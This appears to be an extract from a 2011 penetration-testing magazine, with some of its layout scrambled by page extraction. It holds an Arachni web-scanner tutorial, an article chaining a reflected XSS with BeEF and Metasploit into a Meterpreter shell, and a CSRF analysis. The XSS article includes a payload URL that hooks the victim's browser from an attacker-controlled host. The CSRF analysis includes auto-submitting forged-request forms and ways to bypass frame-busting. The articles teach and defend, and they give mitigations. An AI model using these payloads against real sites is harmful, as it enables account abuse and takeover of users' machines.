• Path traversal
• Response splitting
• OS command injection (*nix, Windows)
• Blind OS command injection using timing attacks (*nix, Windows)
• Remote file inclusion
• Unvalidated redirects
• XPath injection
• Path XSS
• URI XSS
• XSS
• XSS in event attributes of HTML elements
• XSS in HTML tags
• XSS in HTML script tags

Recon Modules:
• Allowed HTTP methods
• Back-up files
• Common directories
• Common files
• HTTP PUT
• Insufficient Transport Layer Protection for password forms
• WebDAV detection
• HTTP TRACE detection
• Credit card number disclosure
• CVS/SVN user disclosure
• Private IP address disclosure
• Common backdoors
• .htaccess LIMIT misconfiguration
• Interesting responses
• HTML object grepper
• E-mail address disclosure
• US Social Security Number disclosure
• Forceful directory listing
talks to one or more dispatchers that will perform the scanning job. New in the latest experimental branch is that dispatchers can communicate with each other and share the load (the Grid).
This is great if you want to speed up the scan, or if you want to execute some crazy things like running
We can vouch that both the simplicity and performance goals have been attained by Arachni. Since the framework is still under heavy development, stability is sometimes lacking, but at no time did this interfere with our vulnerability assessments.
Arachni is highly modular, both from an architecture point of view and a source code point of view. The Arachni client (web or command-line) connects to one or more dispatchers that will execute the scan. The connection to these dispatchers can be secured by SSL encryption and certificate-based authentication. One dispatcher can handle multiple clients. Multiple dispatchers can share a load and communicate with each other to optimise and speed up the scanning process.
The asynchronous scanning engine supports both HTTP and HTTPS and has pause/resume functionality. Arachni supports upstream proxies (SOCKS4, SOCKS4A, SOCKS5, HTTP/1.1 and HTTP/1.0), as well as proxy authentication.
The scanner can authenticate against the web application using form-based authentication, HTTP Basic and Digest authentication, and NTLM.
At the start of every scan, a crawler will try to detect all pages. In version 0.3 this was optional, but since version 0.4 the crawler always runs at the start of the scan. This crawler has filters for redundant pages, based on regular expressions and counters, and can include or exclude URLs based on regular expressions. Optionally, the crawler can also follow subdomains. There is also an adjustable link count and redirect limit.
The HTML parser can extract forms, links, cookies and headers. It can gracefully handle badly written HTML, thanks to a combination of regular expression analysis and the Nokogiri HTML parser.
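As a simplified illustration of the regular-expression side of that approach (Arachni's real parser is more involved, and the constant names here are ours), even HTML with unclosed tags still yields link and form targets:

```ruby
# Badly written HTML: unclosed <a> and <form> tags, missing </body> etc.
BROKEN_HTML = <<~HTML
  <a href="/products.php?id=1">Products
  <form action="/search.php"><input name="q">
HTML

# A strict parser might choke here; simple patterns still recover the
# attack surface (link targets and form actions) from the raw markup.
LINKS = BROKEN_HTML.scan(/href="([^"]+)"/).flatten
FORMS = BROKEN_HTML.scan(/action="([^"]+)"/).flatten
```

Combining such pattern matching with a lenient parser like Nokogiri is what lets the crawler keep going on real-world markup.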
Arachni offers a very simple and easy-to-use module API, enabling a developer to access helper audit methods and write custom modules in a matter of minutes. Arachni already includes a large number of modules: audit modules and reconnaissance (recon) modules. Table 1 provides an overview.
Arachni offers report management. The following reports can be created: standard output, HTML, XML, TXT, YAML serialization, and the Metareport, which provides Metasploit integration for automated and assisted exploitation.
Arachni has many built-in plug-ins that have direct access to the framework instance. Plug-ins can be used to add any functionality to Arachni. Table 2 provides an overview of the currently available plug-ins.
Installation
Arachni consists of client-side (web or shell) and server-side functionality (the dispatchers). A client
Table 2: Included Arachni plug-ins. Plug-ins have direct access to the framework instance and can be used to add any functionality to Arachni.
Plug-ins:
• Passive Proxy: analyses requests and responses between the web application and the browser, assisting in AJAX audits, logging in and/or restricting the scope of the audit
• Form-based AutoLogin: performs an automated login
• Dictionary attacker: performs dictionary attacks against HTTP authentication and form-based authentication
• Profiler: performs taint analysis with benign inputs and response time analysis
• Cookie collector: keeps track of cookies while establishing a timeline of the changes
• Healthmap: generates a sitemap showing the health (vulnerability present or not) of each crawled/audited URL
• Content-types: logs content-types of server responses, aiding in the identification of interesting (possibly leaked) files
• WAF (Web Application Firewall) Detector: establishes a baseline of normal behaviour and uses rDiff analysis to determine if malicious inputs cause any behavioural changes
• MetaModules: loads and runs high-level meta-analysis modules pre/mid/post-scan:
  • AutoThrottle: dynamically adjusts HTTP throughput during the scan for maximum bandwidth utilization
  • TimeoutNotice: provides a notice for issues uncovered by timing attacks when the affected audited pages returned unusually high response times to begin with; it also points out the danger of DoS (Denial-of-Service) attacks against pages that perform heavy-duty processing
  • Uniformity: reports inputs that are uniformly vulnerable across a number of pages, hinting at the lack of a central point of input sanitization
your dispatchers in multiple geographic zones, thanks to Amazon Elastic Compute Cloud (EC2) or similar cloud providers.
Let's get our hands dirty and start with the experimental branch (currently at version 0.4), so we can work with the latest and greatest functionality. Another benefit is that this experimental version can work under Windows.
Installation under Linux is quick and easy, but a Windows set-up requires the installation of Cygwin first. Cygwin is a collection of tools that provide a Linux-like environment on Windows, as well as a large part of the Linux APIs. Another possibility is to run it natively on Windows using MinGW (Minimalist GNU for Windows), but at this moment there are too many problems involved with that.
Linux
Installation under Linux is quite straightforward. Open your favourite shell and execute the commands in Listing 1.
This will install all source directories in your home directory. Change the cd commands if you want the sources somewhere else. In case you need to update to the latest versions, just cd into the three directories above and perform:
$ git pull
$ rake install
Now you can hack the source code locally and play around with Arachni. If you encounter a Typhoeus-related error while running Arachni, issue:
$ gem clean
Windows
Arachni comes with decent documentation, but I had a chuckle when I read the installation instructions for Windows: Windows users should run Arachni in Cygwin. I knew that this was not going to be a smooth ride. Since v0.3 some changes have been made to the experimental version to make it easier, so here we go.
Please note that these installation instructions start with the installation of Cygwin and all required dependencies.
Install or upgrade Cygwin by running setup.exe. Apart from the standard packages, include the following:
• Database: libsqlite3-devel, libsql3_0
• Devel: doxygen, libffi4, gcc4, gcc4-core, gcc4-g++, git, libxml2, libxml2-devel, make, openssl-devel
• Editors: nano
• Libs: libxslt, libxslt-devel, libopenssl098, tcltk, libxml2, libmpfr4
• Net: libcurl-devel, libcurl4
Listing 1: Installation for Linux
$ sudo apt-get install libxml2-dev libxslt1-dev libcurl4-openssl-dev libsqlite3-dev
$ cd
$ git clone git://github.com/eventmachine/eventmachine.git
$ cd eventmachine
$ gem build eventmachine.gemspec
$ gem install eventmachine-1.0.0.beta.4.gem
$ cd
$ git clone git://github.com/Arachni/arachni-rpc.git
$ cd arachni-rpc
$ gem build arachni-rpc.gemspec
$ gem install arachni-rpc-0.1.gem
$ cd
$ git clone git://github.com/Zapotek/arachni.git
$ cd arachni
$ git checkout experimental
$ rake install
Listing 2: Installation for Windows
$ cd
$ git clone git://github.com/eventmachine/eventmachine.git
$ cd eventmachine
$ gem build eventmachine.gemspec
$ gem install eventmachine-1.0.0.beta.4.gem
$ cd
$ git clone git://github.com/Arachni/arachni-rpc.git
$ cd arachni-rpc
$ gem build arachni-rpc.gemspec
$ gem install arachni-rpc-0.1.gem
$ cd
$ git clone git://github.com/Zapotek/arachni.git
$ cd arachni
$ git checkout experimental
$ rake install
Accept the installation of packages that are required to satisfy dependencies. Note that some of your other tools might not work with these libraries or upgrades. In any case, an upgrade of Cygwin usually means recompiling any tools that you compiled earlier.
Some additional libraries are needed for the compilation of Ruby in the next step and must be compiled by hand. First we need to install libffi. Execute the following commands in your Cygwin shell:
$ cd
$ git clone http://github.com/atgreen/libffi.git
$ cd libffi
$ ./configure
$ make
$ make install-libLTLIBRARIES
Next is libyaml. Download the latest stable version of libyaml (currently 0.1.4) from http://pyyaml.org/wiki/LibYAML and move it to your Cygwin home folder (probably C:\cygwin\home\your_windows_id). Execute the following:
$ cd
$ tar xvf yaml-0.1.4.tar.gz
$ cd yaml-0.1.4
$ ./configure
$ make
$ make install
Now we need to compile and install Ruby. Download the latest stable release of Ruby (currently ruby-1.9.2-p290.tar.gz) from http://www.ruby-lang.org and move it to your Cygwin home folder. Execute the following commands in the Cygwin shell:
$ cd
$ tar xvf ruby-1.9.2-p290.tar.gz
$ cd ruby-1.9.2-p290
$ ./configure
$ make
$ make install
From your Cygwin shell, update RubyGems and install some necessary modules:
$ gem update --system
$ gem install rake-compiler
$ cd
$ git clone http://github.com/djberg96/sys-proctable.git
$ cd sys-proctable
$ gem build sys-proctable.gemspec
$ gem install sys-proctable-0.9.1-x86-cygwin.gem
Finally, we can install Arachni (and the source) by executing the commands in Listing 2 from the Cygwin shell (note: these are the same commands as for the Linux installation).
In case of weird error messages regarding fork during compilation (especially on Vista systems), execute the following in your Cygwin shell:
$ find /usr/local -iname '*.so' > /tmp/local.so.lst
Quit all Cygwin shells. Use Windows to browse to C:\cygwin\bin. Right-click ash.exe and choose Run as administrator. Enter in ash:
$ /bin/rebaseall
$ /bin/rebaseall -T /tmp/local.so.lst

Exit ash.
Light my Fire
How to fire up Arachni depends on whether you want to use the new (since version 0.3) web GUI or simply run everything through the command-line interface. Note that the current web GUI does not support all functionality that is available from the command line.
The GUI can be started by executing the following commands
$ arachni_rpcd &
$ arachni_web
After that, browse to http://localhost:4567 and admire the new GUI. You will need to attach the GUI to one or more dispatchers; the dispatcher(s) will run the actual scan.
Figure 1: Edit Dispatchers
If you want to use the command-line interface, just execute:
$ arachni --help
A quick overview of the other screens (Figure 1):
• Start a Scan: start a scan by entering the URL and pressing Launch scan. After a scan is launched, the screen gives an overview of which issues are detected and how far along the process is.
• Modules: enable or disable the more than 40 audit (active) and recon (passive) modules that scan for vulnerabilities such as Cross-Site Scripting (XSS), SQL Injection (SQLi) and Cross-Site Request Forgery (CSRF), detect hidden features, or simply make lists of interesting items such as email addresses.
• Plugins: plug-ins help to automate tasks. Plug-ins are more powerful than modules and make it possible to script login sequences, detect Web Application Firewalls (WAF), perform dictionary attacks, …
• Settings: the settings screen allows you to add cookies and headers, limit the scan to certain directories, …
• Reports: gives access to the scan reports. Arachni creates reports in its own internal format and exports them to HTML, XML or text.
• Add-ons: three add-ons are installed:
  • Auto-deploy: converts any SSH-enabled Linux box into an Arachni dispatcher
  • Tutorial: serves as an example
  • Scheduler: schedules and runs scan jobs at a specific time
• Log: overview of actions taken by the GUI
Your First Scan
We will use both the command-line and the GUI. First the command-line: start a scan with all modules active. This is extremely easy:
$ arachni http://www.example.com --report=afr:outfile=www.example.com.afr
Afterwards, the HTML report can be created by executing the following:
$ arachni --repload=www.example.com.afr --report=html:outfile=www.example.com.html
That's it! Enabling or disabling modules is of course possible. Execute the following command for more information about the possibilities of the command-line interface:
$ arachni --help
Usually it is not necessary to include all recon modules. Some modules will create a lot of requests, making detection of your activities easier (if that is a problem for your assignment) and taking a lot more time to finish. List all modules with the following command:
$ arachni --lsmod
Enabling or disabling modules is easy: use the --mods switch followed by a regular expression to include modules, or exclude modules by prefixing the regular expression with a dash. Example:
$ arachni --mods=*,-xss_* http://www.example.com
The above will load all modules except the modules related to Cross-Site Scripting (XSS).
Using the GUI makes this process even easier. Open the GUI by browsing to http://localhost:4567 and accept the default dispatcher.
The next steps are to verify the settings in the Settings, Modules and Plugins screens. Once you are satisfied, proceed to the Start a Scan screen.
If you want to run a scan against some test applications, visit my blog for the list of deliberately vulnerable applications. Most of these applications can be installed locally or can be attacked online (please read all related FAQs and permissions before scanning a site; in most jurisdictions this is illegal unless permission is explicitly granted by the owner).
After the scan, just go to the Reports screen and download the report in the format you want.
Figure 2: Start a scan screen
Listing 3: Create your own module
=begin
  Arachni
  Copyright (c) 2010-2011 Tasos "Zapotek" Laskos <tasos.laskos@gmail.com>

  This is free software; you can copy and distribute and modify
  this program under the terms of the GPL v2.0 License
  (See LICENSE file for details)
=end

module Arachni
module Modules

#
# Looks for common files on the server, based on wordlists generated
# from open source repositories.
#
# More information about the SVNDigger wordlists:
# http://www.mavitunasecurity.com/blog/svn-digger-better-lists-for-forced-browsing/
#
# The SVNDigger word lists were released under the GPL v3.0 License.
#
# @author Herman Stevens
# @see http://cwe.mitre.org/data/definitions/538.html
#
class SvnDiggerDirs < Arachni::Module::Base

    def initialize( page )
        super( page )
    end

    def prepare
        # to keep track of the requests and not repeat them
        @@__audited ||= Set.new

        @@__directories ||= []
        return unless @@__directories.empty?

        read_file( 'all-dirs.txt' ) do |file|
            @@__directories << file unless file.include?( '.' )
        end
    end

    def run
        path = get_path( @page.url )
        return if @@__audited.include?( path )

        print_status( 'Scanning SVNDigger Dirs...' )

        @@__directories.each do |dirname|
            url = path + dirname + '/'
            print_status( "Checking for #{url}" )

            log_remote_directory_if_exists( url ) do |res|
                print_ok( "Found #{dirname} at " + res.effective_url )
            end
        end

        @@__audited << path
    end

    def self.info
        {
            :name        => 'SVNDigger Dirs',
            :description => %q{Finds directories, based on wordlists
                created from open source repositories. The wordlist
                utilized by this module will be vast and will add a
                considerable amount of time to the overall scan time.},
            :author      => 'Herman Stevens <herman.stevens@gmail.com>',
            :version     => '0.1',
            :references  => {
                'Mavituna Security' =>
                    'http://www.mavitunasecurity.com/blog/svn-digger-better-lists-for-forced-browsing/',
                'OWASP Testing Guide' =>
                    'https://www.owasp.org/index.php/Testing_for_Old_Backup_and_Unreferenced_Files_(OWASP-CM-006)'
            },
            :targets     => { 'Generic' => 'all' },
            :issue       => {
                :name            => %q{A SVNDigger directory was detected.},
                :description     => %q{},
                :tags            => [ 'svndigger', 'path', 'directory', 'discovery' ],
                :cwe             => '538',
                :severity        => Issue::Severity::INFORMATIONAL,
                :cvssv2          => '',
                :remedy_guidance => %q{Review these resources manually.
                    Check if unauthorized interfaces are exposed, or
                    confidential information.},
                :remedy_code     => ''
            }
        }
    end

end
end
end
Create your Own Module
Arachni is very modular and can be easily extended. In the following example we create a new reconnaissance module.
Move into your Arachni source tree; you'll find the modules directory. In there you'll find two directories: audit and recon. Move into the recon directory, where we will create our Ruby module.
Arachni makes it really easy: if your module needs external files, it will search in a subdirectory with the same name. For example, if you create a svn_digger_dirs.rb module, this module is able to find external files in the modules/recon/svn_digger_dirs subdirectory.
Our new reconnaissance module will be based on the SVNDigger wordlists for forced browsing. These wordlists are based on directories found in open source code repositories.
If there is a directory that needed to be protected and you forgot it, it will be found by a scanner that uses these wordlists.
Furthermore, it can be used as a basis for reconnaissance: if a directory or file is detected, this might provide clues about what technology the site is using.
Download the wordlists from the above URL. Create a directory modules/recon/svn_digger_dirs and move the file all-dirs.txt from the wordlist archive to the newly created directory.
Create a copy of the file modules/recon/common_directories.rb and name it svn_digger_dirs.rb. Change the code to read as in Listing 3.
The code does not need a lot of explanation: it checks whether or not a specific directory exists; if yes, it forwards the name to the Arachni Trainer (which will include the directory in the further scans), as well as creating a report entry for it.
Note: the above code, as well as another module based on the SVNDigger wordlists with filenames, is now part of the experimental Arachni code base.
Conclusion
We used Arachni in many of our application vulnerability assessments. The good points are:
• Highly scalable architecture: just create more servers with dispatchers and share the load. This makes the scanner a lot more responsive and fast.
• Highly extensible: create your own modules, plug-ins and even reports with ease.
• User-friendly: start your scan in minutes.
• Very good XSS and SQLi detection, with very few false positives. There are false negatives, but this is usually caused by Arachni not detecting the links to be audited. This weakness in the crawler can be partially offset by manually browsing the site with Arachni configured as a proxy.
• Excellent reporting capabilities, with links provided to additional information and also a reference to the standardised Common Weakness Enumeration (CWE).
Arachni lacks support for the following:
• No AJAX and JSON support
• No JavaScript support
This means that you need to help Arachni find links hidden in JavaScript, e.g. by using it as a proxy between your browser and the web application. You'll need a different tool (or use your brain and manual tests) to check for AJAX/JSON-related vulnerabilities in the application you are testing.
Arachni also cannot examine and decompile Flash components, but a lot of tools are at hand to help you with that. Arachni does not perform WAF (Web Application Firewall) evasion, but then again, this is not necessarily difficult to do manually for a skilled consultant or hacker.
And why not write your own module or plug-in that implements the missing functionality? Arachni is certainly a tool worth adding to your toolkit.
HERMAN STEVENS
After a career of 15 years spanning many roles (developer, security product trainer, information security consultant, Payment Card Industry auditor, application security consultant), Herman Stevens now works and lives in Singapore, where he is the director of his company Astyran Pte Ltd (http://www.astyran.com). Astyran specialises in application security, such as penetration tests, vulnerability assessments, secure code reviews, awareness training and security in the SDLC. Contact Herman through email (herman.stevens@gmail.com) or visit his blog (http://blog.astyran.sg).
In most commercial penetration testing reports it's sufficient to just show a small alert popup; this shows that a particular parameter is vulnerable to an XSS attack. However, this is not how an attacker would operate in the real world. Sure, he'd use a popup initially to find out which parameter is vulnerable to an XSS attack. Once he's identified that, though, he'll look to steal information by executing malicious JavaScript, or even gain total control of the user's machine.
In this article we'll look at how an attacker can gain complete control over a user's browser, ultimately taking over the user's machine, by using BeEF (a browser exploitation framework).
A Simple POC
To start off, though, let's do exactly what the attacker would do, which is to identify a vulnerability. For simplicity's sake, we'll assume that the attacker has already identified a vulnerable parameter on a page. Here are the relevant files, which you too can use on your web server if you want to try this.
HTML Page:

<HTML>
<BODY>
<FORM NAME="test" action="search1.php" method="GET">
Search: <INPUT TYPE="text" name="search"></INPUT>
<INPUT TYPE="submit" name="Submit" value="Submit"></INPUT>
</FORM>
</BODY>
</HTML>
XSS, BeEF and Metasploit Exploitation
Figure 2: BeEF after configuration
Cross-Site Scripting (XSS) is an attack in which an attacker exploits a vulnerability in application code and runs his own JavaScript code in the victim's browser. The impact of an XSS attack is only limited by the potency of the attacker's JavaScript code.
Figure 1: The user enters input in a search box
and click a few buttons to configure it. Alternatively, you could use a distribution like BackTrack, which already has BeEF installed. Here is a screenshot of how BeEF looks after it is configured (Figure 2).
Instead of clicking on a link which generates a popup box, the user will instead be tricked into clicking on a link which tells his browser to connect to the BeEF controller. The URL that the user has to click on is:
http://localhost/search1.php?search=<script src='http://192.168.56.101/beef/hook/beefmagic.js.php'></script>&Submit=Submit
The IP address here is the one on which you have BeEF running. Once the user clicks on the link above, you should see an entry in the BeEF controller window showing that a zombie has connected. You can see this in the Log section on the right-hand side or the Zombie section on the left-hand side. Here is a screenshot which shows that a browser has connected to the BeEF controller (Figure 3).
Click and highlight the zombie in the left pane and then click on Standard Modules, Alert Dialog. This will result in a little popup box on the victim machine. Here's a screenshot which shows the same (Figure 4), and this is what the victim will see (Figure 5).
So, as you can see, because of BeEF even an unskilled attacker can run code which he does not even understand on the victim's machine and steal sensitive data. Hence it becomes all the more
Server Side PHP Code
<?php
$a = $_GET['search'];
echo "The parameter passed is $a";
?>
As you can see, it's some very simple code: the user enters something in a search box on the first page, his input is sent to the server, which reads the value of the parameter and prints it to the screen. If, instead of simple text, the attacker enters JavaScript into the box, the JavaScript will execute on the user's machine rather than being displayed. The user hence just has to be tricked into clicking on a link: http://localhost/search1.php?search=<script>alert(document.domain)</script>
The screenshot below clarifies the above steps (Figure 1)
BeEF – Hook the User's Browser
Now, while this example is sufficient to prove that the site is vulnerable to XSS, it's most certainly not where an attacker will stop. An attacker will use a tool like BeEF (Browser Exploitation Framework) to gain more control over the user's browser and machine.
I used an older version of BeEF (0.3.2) as I just wanted to demonstrate what you can do with such a tool. The newer version has been rewritten completely and has many more features. For now, though, extract BeEF from the tarball and copy it into your web server directory
Figure 3. Connection with the BeEF controller
Figure 4. What the attacker will see
Figure 5. What the victim will see
Figure 6. Defacing the current web page
important to protect against XSS. We'll have a small section right at the end where I briefly tell you how to mitigate XSS.
I'll quickly discuss a few more examples using BeEF before we move on to using it as a platform for other attacks. Here are the screenshots for these; they are all a result of clicking on the various modules available under the Standard Modules menu.
Defacing the Current Web Page
This results in the webpage being rewritten in the victim's browser with the text in the 'DEFACE STRING' box. Try it out (Figure 6).
Detect All Plugins on the User's Browser
There are plenty of other plug-ins inside BeEF, under the Standard Modules and Browser Modules tabs, which you can try out for yourself. I won't discuss all of them here as the principle is the same. What I want to do now, though, is use the user's hooked browser to take complete control of the user's machine itself (Figure 7).
Integrate BeEF with Metasploit and Get a Shell
Edit BeEF's configuration files so that it can talk directly to Metasploit. All I had to edit was msf.php, to set the correct IP address. Once this is done, you can launch Metasploit's browser-based exploits from inside BeEF.
Figure 7. Detecting plugins on the user's browser
Figure 8. Starting Metasploit
Figure 9. The jobs command
Figure 10. Metasploit after clicking Send Now
Figure 11. Meterpreter window – screenshot 1
Figure 12. Meterpreter window – screenshot 2
Now, first ensure that the Zombie is still connected. Then click Standard Modules – Browser Exploit and configure the exploit as per the screenshot below. We're basically setting the variables needed by Metasploit for the exploit to succeed (Figure 8).
Open a shell and run msfconsole to start Metasploit. Once you see the msf> prompt, click the zombie in the browser and click the Send Now button to send the exploit payload to the victim. You can immediately check whether BeEF can talk to Metasploit by running the jobs command (Figure 9).
If the victim's browser is vulnerable to the selected exploit (in this case msvidctl_mpeg2), it will connect back to the running Metasploit instance. Here's what you see in Metasploit a while after you click Send Now (Figure 10).
Once you've got a prompt you're on that remote system and can do anything you want with the privileges of that user. Here are a few more screenshots of what you can do with Meterpreter. The screenshots are self-explanatory, so I won't say much (Figures 11-13).
The user was apparently logged in with admin privileges, and we could create a user by the name dennis on the remote machine. At this point we have complete control over one machine.
Once we have control over this machine, we can use FTP or HTTP to download various other tools – Nmap, Nessus, a sniffer to capture all keystrokes on this machine, or even another copy of Metasploit – and install them on it. We can then use these to port scan an entire internal network or search for vulnerabilities in services running on other machines on the network. Eventually, over a period of time, it is potentially possible to compromise every machine on that network.
Mitigation
To mitigate XSS, one must do the following:
Figure 13. Meterpreter window – screenshot 3
• Make a list of parameters whose values depend on user input and whose resultant values, after being processed by application code, are reflected in the user's browser.
• All such output identified in the first step must be encoded before displaying it to the user. The OWASP XSS Prevention Cheat Sheet is a good guide for this.
• Whitelist and blacklist filtering can also be used to completely disallow specific characters in user input fields.
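The encoding step in the second point can be sketched as follows. This is a minimal helper written for illustration only; production code should use a vetted library such as one of the OWASP encoder projects:

```javascript
// Sketch of output encoding before reflecting user input (hypothetical
// helper). It replaces the characters that let a browser interpret
// input as markup, so a reflected payload arrives as inert text.
function encodeForHtml(input) {
  return String(input)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#x27;");
}

// The attack string from earlier in the article is rendered harmless:
const payload = "<script>alert(document.domain)</script>";
console.log(encodeForHtml(payload));
// the script tags reach the page as text, not as executable markup
```

Applied to the search1.php example, echoing `encodeForHtml($a)` instead of the raw parameter would stop the alert box from ever appearing.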
Conclusion
In a nutshell, we can conclude that if even a single parameter is vulnerable to XSS, it can result in the complete compromise of that user's machine. If the XSS is persistent, the number of users that could potentially be in trouble increases. So while XSS does involve some kind of user interaction, like clicking a link or visiting a page, it is still a high-risk vulnerability and must be mitigated throughout every application.
ARVIND DORAISWAMY
Arvind Doraiswamy is an Information Security Professional with 6 years of experience in system, network and web application penetration testing. In addition, he freelances in information security audits, trainings and product development [Perl, Ruby on Rails], while spending a lot of time learning more about malware analysis and reverse engineering.
Email – arvind.doraiswamy@gmail.com
LinkedIn – http://www.linkedin.com/pub/arvind-doraiswamy/39b21332
Other writings – http://resources.infosecinstitute.com/author/arvind and http://ardsec.blogspot.com
References
• http://www.technicalinfo.net/papers/CSS.html
• https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
• https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
• http://beefproject.com
In simple words: CSRF is when an evil website posts a new status to your Twitter account while your Twitter login session is still active.
CSRF Basics
A simple example of this is the following hidden HTML code inside the evil.com webpage:
<img src="http://twitter.com/home?status=evil.com"
     style="display:none">
Many web developers use POST instead of GET requests to avoid this kind of malicious attack. But this approach is useless, as shown by the following HTML code used to bypass that kind of protection (Listing 1).
Useless Defenses
The following are weak defenses:
• Only accepting POST. This stops simple link-based attacks (IMG, frames, etc.), but hidden POST requests can be created with frames, scripts, etc.
• Referrer checking. Some users prohibit referrers, so you cannot simply require referrer headers; moreover, techniques exist to selectively create HTTP requests without referrers.
• Requiring multi-step transactions. CSRF attacks can simply perform each step in order.
Defense
The approach used by many web developers is CAPTCHA systems and one-time tokens. CAPTCHA systems are widely used, but asking a user to fill in the text from a CAPTCHA image every time he submits a form might make him stop visiting your website. This is why web sites use one-time tokens. Unlike the CAPTCHA system, one-time tokens are unique values stored in a
Cross-site Request Forgery
IN-DEPTH ANALYSIS • CYBER GATES • 2011
Cross-Site Request Forgery (CSRF for short) is a web application vulnerability that allows a malicious website to send unauthorized requests to a vulnerable website using the currently active session of an authorized user.
Listing 1. HTML code used to bypass protection

<div style="display:none">
<iframe name="hiddenFrame"></iframe>
<form name="Form" action="http://site.com/post.php"
      target="hiddenFrame"
      method="POST">
<input type="text" name="message" value="I like www.evil.com">
<input type="submit">
</form>
<script>document.Form.submit()</script>
</div>
index.php (victim website)
And here is the webpage which processes the request and stores the message only if the given token is correct:
post.php (victim website)
In-depth Analysis
In-depth analysis shows that an attacker can use an advanced version of the framing method to perform the task and send POST requests without guessing the token. The following is a real scenario (Listing 4):
index.php (evil website)
For security reasons, the same origin policy in browsers restricts browser-side programming languages such as JavaScript from accessing remote content, so when code such as the following runs:

var token = window.frames[0].document.forms['messageForm'].token.value;

the browser throws the following exception:

Permission denied to access property 'document'
Browser settings are not hard to modify, so the best approach to web application security is to secure the web application itself.
Frame Busting
The best way to protect web applications against this kind of CSRF attack is using FrameKillers together with one-time tokens. FrameKillers are small pieces of JavaScript code used to protect web pages from being framed:

<script type="text/javascript">
if(top != self) top.location.replace(location);
</script>
A FrameKiller consists of a conditional statement and a counter-action statement. Common conditional statements are the following:
if (top != self)
if (top.location != self.location)
if (top.location != location)
if (parent.frames.length > 0)
if (window != top)
if (window.top !== window.self)
if (window.self != window.top)
if (parent && parent != window)
if (parent && parent.frames && parent.frames.length > 0)
if ((self.parent && !(self.parent === self)) && (self.parent.frames.length != 0))
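The intent behind all of these checks can be sketched by evaluating the simplest one, top != self, against simulated window objects. The objects below are hypothetical stand-ins; in a real browser, top and self are supplied by the environment:

```javascript
// Sketch: how the condition `top != self` distinguishes a framed page
// from a top-level one. These window objects are hypothetical stand-ins
// for what the browser provides.
function isFramed(win) {
  return win.top !== win.self;
}

// A top-level window: top and self refer to the same window object.
const topLevel = {};
topLevel.top = topLevel;
topLevel.self = topLevel;

// A framed window: self is the frame itself, top is the embedding page.
const framed = {};
framed.self = framed;
framed.top = topLevel;

console.log(isFramed(topLevel)); // false – no counter-action needed
console.log(isFramed(framed));   // true – trigger the counter-action
```

When the condition is true, the counter-action (discussed next) breaks the page out of the attacker's frame.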
webpage form's hidden field and in a session at the same time, so that they can be compared after the form is submitted.
Attempts to subvert one-time tokens usually rely on brute force attacks. Brute forcing one-time tokens is worthwhile only if the token-generation mechanism is widely used by web developers – for example, the following PHP code:
<?php
$token = md5(uniqid(rand(), TRUE));
$_SESSION['token'] = $token;
?>
Defense Using One-time Tokens
To understand better how this system works, let's take a look at a simple webpage which has a form with a one-time token (Listing 2).
Listing 2. index.php (victim website)

<?php session_start(); ?>
<html>
<head>
<title>GOOD.COM</title>
</head>
<body>
<?php
$token = md5(uniqid(rand(), true));
$_SESSION['token'] = $token;
?>
<form name="messageForm" action="post.php" method="POST">
<input type="text" name="message">
<input type="submit" value="Post">
<input type="hidden" name="token" value="<?php echo $token; ?>">
</form>
</body>
</html>
Listing 3. post.php (victim website)

<?php
session_start();
if($_SESSION['token'] == $_POST['token']) {
    $message = $_POST['message'];
    echo "<b>Message</b><br>$message";
    $file = fopen("messages.txt", "a");
    fwrite($file, "$message\r\n");
    fclose($file);
} else {
    echo "Bad request";
}
?>
And common counter-action statements are these:
top.location = self.location
top.location.href = document.location.href
top.location.replace(self.location)
top.location.href = window.location.href
top.location.replace(document.location)
top.location.href = window.location.href
top.location.href = "URL"
document.write('')
top.location.replace(document.location)
top.location.replace('URL')
top.location.replace(window.location.href)
top.location.href = location.href
self.parent.location = document.location
parent.location.href = self.document.location
Web developers use different FrameKillers, and different techniques are used to bypass them.
Method 1

<script>
window.onbeforeunload = function() {
    return "Do you want to leave this page?";
}
</script>
<iframe src="http://www.good.com"></iframe>
Method 2
Using double framing:

<iframe src="second.html"></iframe>

second.html:

<iframe src="http://www.site.com"></iframe>
Best Practices
And the best example of a FrameKiller is the following:

<style> html { display: none; } </style>
<script>
if (self == top) {
    document.documentElement.style.display = 'block';
} else {
    top.location = self.location;
}
</script>
This protects the web application even if an attacker loads the webpage with JavaScript disabled in the browser (the page then simply stays hidden).
SAMVEL GEVORGYAN
Founder & Managing Director, CYBER GATES
www.cybergates.am | samvel.gevorgyan@cybergates.am
Samvel Gevorgyan is Founder and Managing Director of CYBER GATES Information Security Consulting, Testing and Research Company and has over 5 years of experience working in the IT industry. He started his career as a web designer in 2006, then began seriously learning web programming and web security concepts, which allowed him to gain more knowledge in web design, web programming techniques and information security. All this experience shaped Samvel's work ethic: he started to pay attention to each line of code, for good optimization and for protection against different kinds of malicious attacks such as XSS (Cross-Site Scripting), SQL Injection and CSRF (Cross-Site Request Forgery). Thus Samvel has taken his work to a higher level and is gradually becoming a more complete security professional.
References
• Cross-Site Request Forgery – http://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF), http://projects.webappsec.org/w/page/13246919/Cross-Site-Request-Forgery
• Same Origin Policy
• FrameKiller (Frame Busting) – http://en.wikipedia.org/wiki/Framekiller, http://seclab.stanford.edu/websec/framebusting/framebust.pdf
Listing 4. Real scenario of the attack

<html>
<head>
<title>BAD.COM</title>
<script>
function submitForm() {
    var token = window.frames[0].document.forms['messageForm'].elements['token'].value;
    var myForm = document.myForm;
    myForm.token.value = token;
    myForm.submit();
}
</script>
</head>
<body onLoad="submitForm()">
<div style="display:none">
<iframe src="http://good.com/index.php"></iframe>
<form name="myForm" target="hidden" action="http://good.com/post.php" method="POST">
<input type="text" name="message" value="I like www.bad.com">
<input type="hidden" name="token" value="">
<input type="submit" value="Post">
</form>
</div>
</body>
</html>
WEB APPLICATION CHECKING
Pages 38-39, http://pentestmag.com, 01/2011 (1) November
They are currently being used by hackers on a grand scale as gateways into corporate networks. Web Application Firewalls (WAFs) make it a lot more difficult to penetrate networks.
In most commercial and non-commercial areas the
